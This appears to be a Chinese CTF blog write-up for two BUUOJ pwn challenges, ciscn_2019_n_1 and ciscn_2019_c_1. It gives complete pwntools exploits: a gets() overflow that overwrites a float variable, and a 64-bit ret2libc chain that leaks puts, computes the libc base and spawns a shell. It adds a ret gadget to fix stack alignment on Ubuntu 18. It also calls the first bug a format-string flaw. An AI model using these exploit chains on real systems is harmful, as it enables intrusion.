时隔已久的学习
ciscn_2019_n_1
格式化字符串漏洞
gets是漏洞点,可以利用v1去覆盖v2的值然后获取flag
然后这里可以看出11.28125在4007f4的位置,跟过去看一下
地址是0x41348000
from pwn import *
#context.log_level = "debug"
sh=remote('node3.buuoj.cn',27003)
p1='1'*0x2c+p64(0x41348000)
sh.sendline(p1)
sh.interactive()
ciscn_2019_c_1
就是一个常规题
话说我没练过64位的libc的题(弟弟
网上找东西学了一下
写法和32位不一样,用寄存器传参,需要传递的参数放在 pop rdi 的下面,执行 pop rdi 时,就将栈顶的值赋值给rdi
from pwn import *
#context.log_level="debug"
#sh=process('./ciscn_2019_c_1')
libc=ELF('libc-2.27.so')
sh=remote('node3.buuoj.cn',26817)
elf=ELF('./ciscn_2019_c_1')
#libc_read=libc.symbols['read']
libc_puts=libc.symbols['puts']
libc_system=libc.symbols['system']
libc_binsh=next(libc.search('/bin/sh'))
puts_ply=elf.plt['puts']
puts_got=elf.got['puts']
main_add=elf.symbols['main']
pop1_rid=0x0000000000400c83
p1='A'*0x58
p1+=p64(pop1_rid)+p64(puts_got)+p64(puts_ply)+p64(main_add)
sh.recvuntil('Input your choice!\n')
sh.sendline('1')
sh.recvuntil('Input your Plaintext to be encrypted\n')
sh.sendline(p1)
# # print sh.recvline()
sh.recvuntil('@\n')
puts_real_add=u64(sh.recv(6).ljust(8,'\x00'))
print hex(puts_real_add)
# #pwnlib.gdb.attach(sh)
libcbase=puts_real_add-libc_puts
# print hex(libcbase)
system_real_add=libcbase+libc_system
binsh_real_add=libcbase+libc_binsh
p2='A'*0x58
p2+=p64(pop1_rid)+p64(binsh_real_add)+p64(system_real_add)
sh.recvuntil('Input your choice!\n')
sh.sendline('1')
sh.recvuntil('Input your Plaintext to be encrypted\n')
sh.sendline(p2)
sh.interactive()
本地完全没问题
但是远程
打不过去,贼气,我觉得是远端的问题,找了几个大佬的exp,也打不过去。
唯一学到的新姿势是这个
sh.recvuntil('@\n')
puts_real_add=u64(sh.recv(6).ljust(8,'\x00'))
以前是用print然后根据后三位去找它的位置,特别麻烦
我果然是弟弟
找到问题所在了!!!!!p2应该写成
p2='A'*0x58
p2+=p64(0x00000000004006b9)+p64(pop1_rid)+p64(binsh_real_add)+p64(system_real_add)
出现这个问题的原因是
Ubuntu18调用system的时候要对齐栈,需要附加一个ret来保证堆栈平衡,这样程序才会顺利地运行,否则则会直接crash
当然也可以不用ret来解决,用迁移栈或者改变payload长度的方式也能达到同样的效果
耶耶耶耶耶解决了是今日份快乐